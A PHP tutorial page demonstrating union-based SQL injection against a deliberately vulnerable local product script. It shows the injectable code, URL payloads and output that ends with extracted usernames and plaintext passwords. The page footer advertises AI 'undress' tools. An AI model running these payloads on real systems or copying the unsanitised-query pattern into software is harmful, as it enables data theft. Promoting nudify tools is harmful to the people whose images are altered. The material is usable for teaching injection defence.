A complete process of SQL injection in PHP-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

A complete process of SQL injection in PHP

不言

Apr 10, 2018 am 10:32 AM

phpwholeprocess

The content of this article is a complete process of SQL injection in PHP. Now I share it with everyone. Friends in need can refer to it.

After learning some skills of SQL injection, the following is Simple practice of SQL injection into PHP MYSQL

First observe two MYSQL data tables

User record table:

REATE TABLE `php_user` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default &#39;&#39;,
`password` varchar(20) NOT NULL default &#39;&#39;,
`userlevel` char(2) NOT NULL default &#39;0&#39;,
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_user` VALUES (1, &#39;seven&#39;, &#39;seven_pwd&#39;, &#39;10&#39;);
INSERT INTO `php_user` VALUES (2, &#39;swons&#39;, &#39;swons_pwd&#39;, &#39;&#39;);

## Product record list:

CREATE TABLE `php_product` (
`id` int(11) NOT NULL auto_increment,
`name` varchar(100) NOT NULL default &#39;&#39;,
`price` float NOT NULL default &#39;0&#39;,
`img` varchar(200) NOT NULL default &#39;&#39;,
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
INSERT INTO `php_product` VALUES (1, &#39;name_1&#39;, 12.2, &#39;images/name_1.jpg&#39;);
INSERT INTO `php_product` VALUES (2, &#39;name_2&#39;, 35.25, &#39;images/name_2.jpg&#39;);

The following file is show_product.php used to display the product list. SQL injection also exploits the SQL statement vulnerability of this file

<?php
$conn = mysql_connect("localhost", "root", "root");
if(!$conn){
echo "数据库联接错误";
exit;
}
if (!mysql_select_db("phpsql")) {
echo "选择数据库出错" . mysql_error();
exit;
}
$tempID=$_GET[&#39;id&#39;];
if($tempID<=0 || !isset($tempID)) $tempID=1;
$sql = "SELECT * FROM php_product WHERE id =$tempID";
echo $sql.&#39;<br>&#39;;
$result = mysql_query($sql);
if (!$result) {
echo "查询出错" . mysql_error();
exit;
}
if (mysql_num_rows($result) == 0) {
echo "没有查询结果";
exit;
}
while ($row = mysql_fetch_assoc($result)) {
echo &#39;ID:&#39;.$row["id"].&#39;<br>&#39;;
echo &#39;name:&#39;.$row["name"].&#39;<br>&#39;;
echo &#39;price:&#39;.$row["price"].&#39;<br>&#39;;
echo &#39;image:&#39;.$row["img"].&#39;<br>&#39;;
}
?>

##Observe this statement: $sql = "SELECT * FROM php_product WHERE id =$tempID";

$tempID is obtained from $_GET. We can construct the value of this variable to achieve the purpose of SQL injection

Construct the following links respectively:

http://localhost/phpsql/index.php?id=1

Get the following output

SELECT * FROM php_product WHERE id =1 //当前执行的SQL语句

//Get the product information list with ID 1

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

2、 http://localhost/phpsql/index.php?id=1 or 1=1

得到输出

SELECT * FROM php_product WHERE id =1 or 1=1 //当前执行的SQL语句

//一共两条产品资料列表

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:2

name:name_2

price:35.25

image:images/name_2.jpg

1和2都得到资料列表输出，证明SQL语句执行成功

3、判断数据表字段数量

http://localhost/phpsql/index.php?id=1 union select 1,1,1,1

得到输出

SELECT * FROM php_product WHERE id =1 union select 1,1,1,1 //当前执行的SQL语句

//一共两条记录，注意第二条的记录为全1，这是union select联合查询的结果。

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:1

name:1

price:1

image:1

4、判断数据表字段类型

http://localhost/phpsql/index.php?id=1 union select char(65),char(65),char(65),char(65)

得到输出

SELECT * FROM php_product WHERE id =1 union select char(65),char(65),char(65),char(65)

ID:1

name:name_1

price:12.2

image:images/name_1.jpg

ID:0

name:A

price:0

image:A

注意第二条记录，如果后面的值等于A，说明这个字段与union查询后面构造的字段类型相符。此时union后面

为char(65)，表示字符串类型。经过观察。可以发现name字段和image字段的类型都是字符串类型

5、大功告成，得到我们想要的东西：

http://localhost/phpsql/index.php?id=10000 union select 1,username,1,password from php_user

得到输出：

SELECT * FROM php_product WHERE id =10000 union select 1,username,1,password from php_user

##//Output two user information, name is the user name , image is the user password.

ID:1

name:seven

price:1

image:seven_pwd

ID:1

name:swons

price:1

image:swons_pwd

Note that the ID=10000 in the URL is to not get the product information, only to get the following union query results. In more practical situations, the value of the ID is different.

The username and password of the union must be placed in positions 2 and 4. Only in this way can it match the previous select statement. This is the characteristic of the union query

statement

Remarks:

This is a simple injection method is more context-specific. In reality it's more complicated than this. But the principle is the same.

related suggestion:

Data security method for PHP to prevent SQL injection

Example of method for PHP to prevent SQL injection

The above is the detailed content of A complete process of SQL injection in PHP. For more information, please follow other related articles on the PHP Chinese website!

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Explain the concept of a PHP session in simple terms.Apr 26, 2025 am 12:09 AM

PHPsessionstrackuserdataacrossmultiplepagerequestsusingauniqueIDstoredinacookie.Here'showtomanagethemeffectively:1)Startasessionwithsession_start()andstoredatain$_SESSION.2)RegeneratethesessionIDafterloginwithsession_regenerate_id(true)topreventsessi

How do you loop through all the values stored in a PHP session?Apr 26, 2025 am 12:06 AM

In PHP, iterating through session data can be achieved through the following steps: 1. Start the session using session_start(). 2. Iterate through foreach loop through all key-value pairs in the $_SESSION array. 3. When processing complex data structures, use is_array() or is_object() functions and use print_r() to output detailed information. 4. When optimizing traversal, paging can be used to avoid processing large amounts of data at one time. This will help you manage and use PHP session data more efficiently in your actual project.

Explain how to use sessions for user authentication.Apr 26, 2025 am 12:04 AM

The session realizes user authentication through the server-side state management mechanism. 1) Session creation and generation of unique IDs, 2) IDs are passed through cookies, 3) Server stores and accesses session data through IDs, 4) User authentication and status management are realized, improving application security and user experience.

Give an example of how to store a user's name in a PHP session.Apr 26, 2025 am 12:03 AM

Tostoreauser'snameinaPHPsession,startthesessionwithsession_start(),thenassignthenameto$_SESSION['username'].1)Usesession_start()toinitializethesession.2)Assigntheuser'snameto$_SESSION['username'].Thisallowsyoutoaccessthenameacrossmultiplepages,enhanc

What are some common problems that can cause PHP sessions to fail?Apr 25, 2025 am 12:16 AM

Reasons for PHPSession failure include configuration errors, cookie issues, and session expiration. 1. Configuration error: Check and set the correct session.save_path. 2.Cookie problem: Make sure the cookie is set correctly. 3.Session expires: Adjust session.gc_maxlifetime value to extend session time.

How do you debug session-related issues in PHP?Apr 25, 2025 am 12:12 AM

Methods to debug session problems in PHP include: 1. Check whether the session is started correctly; 2. Verify the delivery of the session ID; 3. Check the storage and reading of session data; 4. Check the server configuration. By outputting session ID and data, viewing session file content, etc., you can effectively diagnose and solve session-related problems.

What happens if session_start() is called multiple times?Apr 25, 2025 am 12:06 AM

Multiple calls to session_start() will result in warning messages and possible data overwrites. 1) PHP will issue a warning, prompting that the session has been started. 2) It may cause unexpected overwriting of session data. 3) Use session_status() to check the session status to avoid repeated calls.

How do you configure the session lifetime in PHP?Apr 25, 2025 am 12:05 AM

Configuring the session lifecycle in PHP can be achieved by setting session.gc_maxlifetime and session.cookie_lifetime. 1) session.gc_maxlifetime controls the survival time of server-side session data, 2) session.cookie_lifetime controls the life cycle of client cookies. When set to 0, the cookie expires when the browser is closed.

See all articles

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

Assassin's Creed Shadows: Seashell Riddle Solution

4 weeks agoByDDD

What's New in Windows 11 KB5054979 & How to Fix Update Issues

3 weeks agoByDDD

Where to find the Crane Control Keycard in Atomfall

4 weeks agoByDDD

Roblox: Dead Rails - How To Complete Every Challenge

1 months agoByDDD

How to fix KB5055523 fails to install in Windows 11?

2 weeks agoByDDD

Hot Tools

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft

MinGW - Minimalist GNU for Windows

This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.